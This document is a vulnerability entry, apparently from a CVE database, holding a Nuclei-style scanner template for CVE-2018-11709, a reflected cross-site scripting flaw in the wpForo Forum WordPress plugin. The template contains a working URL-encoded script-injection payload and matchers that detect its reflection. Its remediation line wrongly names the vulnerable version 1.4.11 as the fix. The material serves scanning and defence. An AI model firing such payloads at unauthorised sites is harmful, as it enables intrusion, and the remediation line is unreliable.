漏洞描述
WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
CVE-2018-11709: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2018-11709
info:
name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-11709
- https://wordpress.org/plugins/wpforo/#developers
- https://wpvulndb.com/vulnerabilities/9090
- https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-11709
cwe-id: CWE-79
epss-score: 0.06788
epss-percentile: 0.90958
cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: gvectors
product: wpforo_forum
framework: wordpress
tags: cve,cve2018,wordpress,xss,wp-plugin,gvectors
http:
- method: GET
path:
- '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022049039de3b74e55ae42e5cdf527ab0ef303f107d48668c611808f596a89a0e2d1022100d5c90422f8a16c5fc2f4b35bacd630e88982e6543aa8fe6c328d739984358b02:922c64590222798bb761d5b6d8e72950